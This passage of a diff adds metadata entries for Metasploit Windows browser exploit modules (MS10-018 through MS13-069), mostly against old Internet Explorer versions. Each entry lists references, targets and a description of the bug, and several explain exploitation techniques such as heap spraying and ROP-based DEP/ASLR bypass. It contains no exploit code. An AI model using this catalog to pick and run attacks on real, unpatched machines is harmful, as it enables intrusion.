the destination being the same variant. So if you send as a variant\n an IDISPATCH the algorithm will try to do a VariantClear of the destination before\n using it. 
This will end up on a call to PlainRelease which deref the reference\n and clean the object.\"\n\n NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.", + "references": [ + "CVE-2010-0806", + "OSVDB-62810", + "BID-38615", + "URL-https://web.archive.org/web/20100929225343/http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/", + "URL-https://web.archive.org/web/20120627174253/http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html", + "MSB-MS10-018" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista", + "IE 6 SP0-SP2 (onclick)", + "IE 7.0 (marquee)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms10_018_ie_behaviors", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms10_018_ie_tabular_activex": { + "name": "MS10-018 Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption", + "fullname": "exploit/windows/browser/ms10_018_ie_tabular_activex", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-03-09", + "type": "exploit", + "author": [ + "Unknown", + "jduck " + ], + "description": "This module exploits a memory corruption vulnerability in the Internet Explorer\n Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet\n Explorer are vulnerable.\n\n By specifying a long value as the \"DataURL\" parameter to this control, it is possible\n to write a NUL byte outside the bounds of an array. 
By targeting control flow data\n on the stack, an attacker can execute arbitrary code.", + "references": [ + "CVE-2010-0805", + "OSVDB-63329", + "BID-39025", + "ZDI-10-034", + "MSB-MS10-018" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic (Heap Spray)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms10_018_ie_tabular_activex", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms10_022_ie_vbscript_winhlp32": { + "name": "MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution", + "fullname": "exploit/windows/browser/ms10_022_ie_vbscript_winhlp32", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-02-26", + "type": "exploit", + "author": [ + "Maurycy Prodeus", + "jduck " + ], + "description": "This module exploits a code execution vulnerability that occurs when a user\n presses F1 on MessageBox originated from VBscript within a web page. When the\n user hits F1, the MessageBox help functionality will attempt to load and use\n a HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server.\n\n This particular version of the exploit implements a WebDAV server that will\n serve HLP file as well as a payload EXE. During testing warnings about the\n payload EXE being unsigned were witnessed. 
A future version of this module\n might use other methods that do not create such a warning.", + "references": [ + "CVE-2010-0483", + "OSVDB-62632", + "MSB-MS10-022", + "URL-https://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx", + "URL-https://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Internet Explorer on Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms10_022_ie_vbscript_winhlp32", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms10_026_avi_nsamplespersec": { + "name": "MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow", + "fullname": "exploit/windows/browser/ms10_026_avi_nsamplespersec", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-04-13", + "type": "exploit", + "author": [ + "Yamata Li", + "Shahin Ramezany ", + "juan vazquez ", + "Jordi Sanchez " + ], + "description": "This module exploits a buffer overflow in l3codecx.ax while processing a\n AVI files with MPEG Layer-3 audio contents. 
The overflow only allows to overwrite\n with 0's so the three least significant bytes of EIP saved on stack are\n overwritten and shellcode is mapped using the .NET DLL memory technique pioneered\n by Alexander Sotirov and Mark Dowd.\n\n Please note on IE 8 targets, your malicious URL must be a trusted site in order\n to load the .Net control.", + "references": [ + "CVE-2010-0480", + "OSVDB-63749", + "BID-39303", + "MSB-MS10-026", + "URL-http://web.archive.org/web/20110916145030/http://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/", + "URL-http://www.phreedom.org/research/bypassing-browser-memory-protections/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 Automatic" + ], + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms10_026_avi_nsamplespersec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms10_042_helpctr_xss_cmd_exec": { + "name": "Microsoft Help Center XSS and Command Execution", + "fullname": "exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-06-09", + "type": "exploit", + "author": [ + "Tavis Ormandy", + "natron " + ], + "description": "Help and Support Center is the default application provided to access online\n documentation for Microsoft Windows. Microsoft supports accessing help documents\n directly via URLs by installing a protocol handler for the scheme \"hcp\". 
Due to\n an error in validation of input to hcp:// combined with a local cross site\n scripting vulnerability and a specialized mechanism to launch the XSS trigger,\n arbitrary command execution can be achieved.\n\n On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it\n can be used to launch the exploit automatically. If IE8 and WMP11, either can\n be used to launch the attack, but both pop dialog boxes asking the user if\n execution should continue. This exploit detects if non-intrusive mechanisms are\n available and will use one if possible. In the case of both IE8 and WMP11, the\n exploit defaults to using an iframe on IE8, but is configurable by setting the\n DIALOGMECH option to \"none\" or \"player\".\n\n This module creates a WebDAV service from which the payload is copied to the\n victim machine.", + "references": [ + "CVE-2010-1885", + "OSVDB-65264", + "MSB-MS10-042" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-05-30 10:56:41 +0000", + "path": "/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms10_042_helpctr_xss_cmd_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms10_046_shortcut_icon_dllloader": { + "name": "Microsoft Windows Shell LNK Code Execution", + "fullname": "exploit/windows/browser/ms10_046_shortcut_icon_dllloader", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-07-16", + "type": "exploit", + "author": [ + "hdm ", + "jduck ", + "B_H" + ], + "description": "This module exploits a vulnerability in the handling of Windows\n Shortcut files (.LNK) that contain an icon resource pointing to a\n malicious DLL. 
This module creates a WebDAV service that can be used\n to run an arbitrary payload when accessed as a UNC path.", + "references": [ + "CVE-2010-2568", + "OSVDB-66387", + "MSB-MS10-046" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms10_046_shortcut_icon_dllloader", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms10_090_ie_css_clip": { + "name": "MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption", + "fullname": "exploit/windows/browser/ms10_090_ie_css_clip", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-11-03", + "type": "exploit", + "author": [ + "unknown", + "Yuange", + "Matteo Memelli", + "jduck " + ], + "description": "This module exploits a memory corruption vulnerability within Microsoft's\n HTML engine (mshtml). When parsing an HTML page containing a specially\n crafted CSS tag, memory corruption occurs that can lead arbitrary code\n execution.\n\n It seems like Microsoft code inadvertently increments a vtable pointer to\n point to an unaligned address within the vtable's function pointers. This\n leads to the program counter being set to the address determined by the\n address \"[vtable+0x30+1]\". The particular address depends on the exact\n version of the mshtml library in use.\n\n Since the address depends on the version of mshtml, some versions may not\n be exploitable. 
Specifically, those ending up with a program counter value\n within another module, in kernel space, or just not able to be reached with\n various memory spraying techniques.\n\n Also, since the address is not controllable, it is unlikely to be possible\n to use ROP to bypass non-executable memory protections.", + "references": [ + "CVE-2010-3962", + "OSVDB-68987", + "BID-44536", + "EDB-15421", + "MSB-MS10-090" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Debug", + "Internet Explorer 6", + "Internet Explorer 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms10_090_ie_css_clip", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms11_003_ie_css_import": { + "name": "MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free", + "fullname": "exploit/windows/browser/ms11_003_ie_css_import", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-11-29", + "type": "exploit", + "author": [ + "passerby", + "d0c_s4vage", + "jduck " + ], + "description": "This module exploits a memory corruption vulnerability within Microsoft\\'s\n HTML engine (mshtml). When parsing an HTML page containing a recursive CSS\n import, a C++ object is deleted and later reused. This leads to arbitrary\n code execution.\n\n This exploit utilizes a combination of heap spraying and the\n .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not\n opt-in to ASLR. 
As such, this module should be reliable on all Windows\n versions with .NET 2.0.50727 installed.", + "references": [ + "CVE-2010-3971", + "OSVDB-69796", + "BID-45246", + "URL-http://www.wooyun.org/bugs/wooyun-2010-0885", + "URL-https://seclists.org/fulldisclosure/2010/Dec/110", + "MSB-MS11-003" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Internet Explorer 8", + "Internet Explorer 7", + "Internet Explorer 6", + "Debug Target (Crash)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms11_003_ie_css_import.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms11_003_ie_css_import", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms11_050_mshtml_cobjectelement": { + "name": "MS11-050 IE mshtml!CObjectElement Use After Free", + "fullname": "exploit/windows/browser/ms11_050_mshtml_cobjectelement", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-06-16", + "type": "exploit", + "author": [ + "d0c_s4vage", + "sinn3r ", + "bannedit " + ], + "description": "This module exploits a use-after-free vulnerability in Internet Explorer. The\n vulnerability occurs when an invalid tag exists and other elements\n overlap/cover where the object tag should be when rendered (due to their\n styles/positioning). The mshtml!CObjectElement is then freed from memory because\n it is invalid. 
However, the mshtml!CDisplay object for the page continues to keep\n a reference to the freed and attempts to call a function on it, leading\n to the use-after-free.\n\n Please note that for IE 8 targets, JRE (Java Runtime Environment) is required\n to bypass DEP (Data Execution Prevention).", + "references": [ + "CVE-2011-1260", + "OSVDB-72950", + "MSB-MS11-050", + "URL-http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Internet Explorer 7 on XP SP3", + "Internet Explorer 7 on Windows Vista", + "Internet Explorer 8 on XP SP3", + "Internet Explorer 8 on Windows 7", + "Debug Target (Crash)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms11_050_mshtml_cobjectelement", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms11_081_option": { + "name": "MS11-081 Microsoft Internet Explorer Option Element Use-After-Free", + "fullname": "exploit/windows/browser/ms11_081_option", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-10-11", + "type": "exploit", + "author": [ + "Ivan Fratric", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits a vulnerability in Microsoft Internet Explorer. 
A memory\n corruption may occur when the Option cache isn't updated properly, which allows\n other JavaScript methods to access a deleted Option element, and results in code\n execution under the context of the user.", + "references": [ + "CVE-2011-1996", + "OSVDB-76208", + "MSB-MS11-081", + "URL-http://ifsec.blogspot.com/2011/10/internet-explorer-option-element-remote.html", + "URL-http://pastebin.com/YLH725Aj" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 8 on Windows XP SP3", + "IE 8 on Windows Vista", + "IE 8 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms11_081_option.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms11_081_option", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms11_093_ole32": { + "name": "MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution", + "fullname": "exploit/windows/browser/ms11_093_ole32", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-12-13", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "juan vazquez " + ], + "description": "This module exploits a type confusion vulnerability in the OLE32 component of\n Windows XP SP3. 
The vulnerability exists in the CPropertyStorage::ReadMultiple\n function.\n\n A Visio document with a specially crafted Summary Information Stream embedded allows\n to get remote code execution through Internet Explorer, on systems with Visio Viewer\n installed.", + "references": [ + "MSB-MS11-093", + "CVE-2011-3400", + "OSVDB-77663", + "BID-50977", + "URL-http://aluigi.org/adv/ole32_1-adv.txt", + "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=966" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3 / Visio Viewer 2010", + "IE 7 on Windows XP SP3 / Visio Viewer 2010" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms11_093_ole32.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms11_093_ole32", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms12_004_midi": { + "name": "MS12-004 midiOutPlayNextPolyEvent Heap Overflow", + "fullname": "exploit/windows/browser/ms12_004_midi", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-01-10", + "type": "exploit", + "author": [ + "Shane Garrett", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits a heap overflow vulnerability in the Windows Multimedia\n Library (winmm.dll). The vulnerability occurs when parsing specially crafted\n MIDI files. 
Remote code execution can be achieved by using the Windows Media Player\n ActiveX control.\n\n Exploitation is done by supplying a specially crafted MIDI file with\n specific events, causing the offset calculation being higher than what is\n available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing\n us to either \"inc al\" or \"dec al\" a byte. This can be used to corrupt an array\n (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects,\n which leverages remote code execution under the context of the user.\n\n Note: At this time, for IE 8 target, msvcrt ROP is used by default. However,\n if you know your target's patch level, you may also try the 'MSHTML' advanced\n option for an info leak based attack. Currently, this module only supports two\n MSHTML builds: 8.0.6001.18702, which is often seen in a newly installed XP SP3.\n Or 8.0.6001.19120, which is patch level before the MS12-004 fix.\n\n Also, based on our testing, the vulnerability does not seem to trigger when\n the victim machine is operated via rdesktop.", + "references": [ + "MSB-MS12-004", + "CVE-2012-0003", + "OSVDB-78210", + "BID-51292" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms12_004_midi.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms12_004_midi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms12_037_ie_colspan": { + "name": "MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow", + "fullname": "exploit/windows/browser/ms12_037_ie_colspan", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-06-12", + "type": 
"exploit", + "author": [ + "Alexandre Pelletier", + "mr_me ", + "binjo", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a heap overflow vulnerability in Internet Explorer caused\n by an incorrect handling of the span attribute for col elements from a fixed table,\n when they are modified dynamically by javascript code.", + "references": [ + "CVE-2012-1876", + "OSVDB-82866", + "BID-53848", + "MSB-MS12-037" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 8 on Windows XP SP3 with msvcrt ROP", + "IE 8 on Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms12_037_ie_colspan.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms12_037_ie_colspan", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms12_037_same_id": { + "name": "MS12-037 Microsoft Internet Explorer Same ID Property Deleted Object Handling Memory Corruption", + "fullname": "exploit/windows/browser/ms12_037_same_id", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-06-12", + "type": "exploit", + "author": [ + "Dark Son", + "Unknown", + "Yichong Lin", + "juan vazquez " + ], + "description": "This module exploits a memory corruption flaw in Internet Explorer 8 when\n handling objects with the same ID property. At the moment this module targets\n IE8 over Windows XP SP3 and Windows 7. 
This module supports heap massaging\n as well as the heap spray method seen in the wild (Java msvcrt71.dll).", + "references": [ + "MSB-MS12-037", + "CVE-2012-1875", + "OSVDB-82865", + "URL-http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/", + "URL-https://twitter.com/binjo/status/212795802974830592", + "URL-https://www.rapid7.com/blog/post/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 8 on Windows XP SP3 with msvcrt ROP", + "IE 8 on Windows XP SP3 with JRE ROP", + "IE 8 on Windows 7 SP1/Vista SP2 with JRE ROP" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/browser/ms12_037_same_id.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms12_037_same_id", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms13_009_ie_slayoutrun_uaf": { + "name": "MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free", + "fullname": "exploit/windows/browser/ms13_009_ie_slayoutrun_uaf", + "aliases": [], + "rank": 200, + "disclosure_date": "2013-02-13", + "type": "exploit", + "author": [ + "Scott Bell " + ], + "description": "This module exploits a use-after-free vulnerability in Microsoft Internet Explorer\n where a CParaElement node is released but a reference is still kept\n in CDoc. 
This memory is reused when a CDoc relayout is performed.", + "references": [ + "CVE-2013-0025", + "OSVDB-90122", + "MSB-MS13-009", + "URL-http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 8 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms13_009_ie_slayoutrun_uaf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms13_022_silverlight_script_object": { + "name": "MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access", + "fullname": "exploit/windows/browser/ms13_022_silverlight_script_object", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-03-12", + "type": "exploit", + "author": [ + "James Forshaw", + "Vitaliy Toropov", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\n from System.Windows.dll. 
This module has been tested successfully on IE6 - IE10, Windows XP\n SP3 / Windows 7 SP1.", + "references": [ + "CVE-2013-0074", + "CVE-2013-3896", + "OSVDB-91147", + "OSVDB-98223", + "BID-58327", + "BID-62793", + "MSB-MS13-022", + "MSB-MS13-087", + "PACKETSTORM-123731" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86/x64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms13_022_silverlight_script_object", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms13_037_svg_dashstyle": { + "name": "MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow", + "fullname": "exploit/windows/browser/ms13_037_svg_dashstyle", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-03-06", + "type": "exploit", + "author": [ + "Nicolas Joly", + "4B5F5F4B", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits an integer overflow vulnerability on Internet Explorer.\n The vulnerability exists in the handling of the dashstyle.array length for vml\n shapes on the vgx.dll module.\n\n The exploit has been built and tested specifically against Windows 7 SP1 with\n Internet Explorer 8. It uses either JRE6 or an information leak (to ntdll) to\n bypass ASLR, and by default the info leak is used. To make sure the leak is\n successful, the ntdll version should be either v6.1.7601.17514 (the default dll\n version on a newly installed/unpatched Windows 7 SP1), or ntdll.dll v6.1.7601.17725\n (installed after apply MS12-001). 
If the target doesn't have the version the exploit\n wants, it will refuse to attack by sending a fake 404 message (webpage not found).\n\n If you wish to try the JRE6 component instead to bypass ASLR, you can set the\n advanced datastore option to 'JRE6'. If JRE6 is chosen but the target doesn't\n have this particular component, the exploit will also refuse to attack by\n sending a 404 message.", + "references": [ + "CVE-2013-2551", + "OSVDB-91197", + "BID-58570", + "MSB-MS13-037", + "URL-http://binvul.com/viewthread.php?tid=311" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IE 8 on Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms13_037_svg_dashstyle", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms13_055_canchor": { + "name": "MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free", + "fullname": "exploit/windows/browser/ms13_055_canchor", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-07-09", + "type": "exploit", + "author": [ + "Jose Antonio Vazquez Gonzalez", + "Orange Tsai", + "Peter Vreugdenhil", + "sinn3r " + ], + "description": "In IE8 standards mode, it's possible to cause a use-after-free condition by first\n creating an illogical table tree, where a CPhraseElement comes after CTableRow,\n with the final node being a sub table element. When the CPhraseElement's outer\n content is reset by using either outerText or outerHTML through an event handler,\n this triggers a free of its child element (in this case, a CAnchorElement, but\n some other objects apply too), but a reference is still kept in function\n SRunPointer::SpanQualifier. 
This function will then pass on the invalid reference\n to the next functions, eventually used in mshtml!CElement::Doc when it's trying to\n make a call to the object's SecurityContext virtual function at offset +0x70, which\n results a crash. An attacker can take advantage of this by first creating an\n CAnchorElement object, let it free, and then replace the freed memory with another\n fake object. Successfully doing so may allow arbitrary code execution under the\n context of the user.\n\n This bug is specific to Internet Explorer 8 only. It was originally discovered by\n Jose Antonio Vazquez Gonzalez and reported to iDefense, but was discovered again\n by Orange Tsai at Hitcon 2013.", + "references": [ + "CVE-2013-3163", + "OSVDB-94981", + "MSB-MS13-055", + "URL-https://speakerd.s3.amazonaws.com/presentations/0df98910d26c0130e8927e81ab71b214/for-share.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 8 on Windows XP SP3", + "IE 8 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms13_055_canchor.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms13_055_canchor", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms13_059_cflatmarkuppointer": { + "name": "MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free", + "fullname": "exploit/windows/browser/ms13_059_cflatmarkuppointer", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-06-27", + "type": "exploit", + "author": [ + "corelanc0d3r", + "sinn3r " + ], + "description": "This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9,\n it seems to only affect certain releases of mshtml.dll, ranging from a newly\n installed IE9 (9.0.8112.16446), to 9.00.8112.16502 (July 2013 update). 
IE8\n requires a different way to trigger the vulnerability, but not currently covered\n by this module.\n\n The issue is specific to the browser's IE7 document compatibility, which can be\n defined in X-UA-Compatible, and the content editable mode must be enabled. An\n \"onmove\" event handler is also necessary to be able to trigger the bug, and the\n event will be run twice before the crash. The first time is due to the position\n change of the body element, which is also when a MSHTML!CFlatMarkupPointer::`vftable'\n object is created during a \"SelectAll\" command, and this object will be used later\n on for the crash. The second onmove event seems to be triggered by a InsertButton\n (or Insert-whatever) command, which is also responsible for the free of object\n CFlatMarkupPointer during page rendering. The EnsureRecalcNotify() function will\n then still return an invalid reference to CFlatMarkupPointer (stored in EBX), and\n then passes this on to the next functions (GetLineInfo -> QIClassID). When this\n reference arrives in function QIClassID, an access violation finally occurs when\n the function is trying to call QueryInterface() with the bad reference, and this\n results a crash. 
Successful control of the freed memory may leverage arbitrary code\n execution under the context of the user.\n\n Note: It is also possible to see a different object being freed and used, doesn't\n always have to be CFlatMarkupPointer.", + "references": [ + "CVE-2013-3184", + "OSVDB-96182", + "MSB-MS13-059", + "BID-61668", + "ZDI-13-194", + "ZDI-13-195" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms13_059_cflatmarkuppointer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms13_069_caret": { + "name": "MS13-069 Microsoft Internet Explorer CCaret Use-After-Free", + "fullname": "exploit/windows/browser/ms13_069_caret", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-09-10", + "type": "exploit", + "author": [ + "corelanc0d3r", + "sinn3r " + ], + "description": "This module exploits a use-after-free vulnerability found in Internet Explorer,\n specifically in how the browser handles the caret (text cursor) object. In IE's standards\n mode, the caret handling's vulnerable state can be triggered by first setting up an\n editable page with an input field, and then we can force the caret to update in an\n onbeforeeditfocus event by setting the body's innerHTML property. In this event handler,\n mshtml!CCaret::`vftable' can be freed using a document.write() function, however,\n mshtml!CCaret::UpdateScreenCaret remains unaware of this change, and still uses the\n same reference to the CCaret object. When the function tries to use this invalid reference\n to call a virtual function at offset 0x2c, it finally results a crash. 
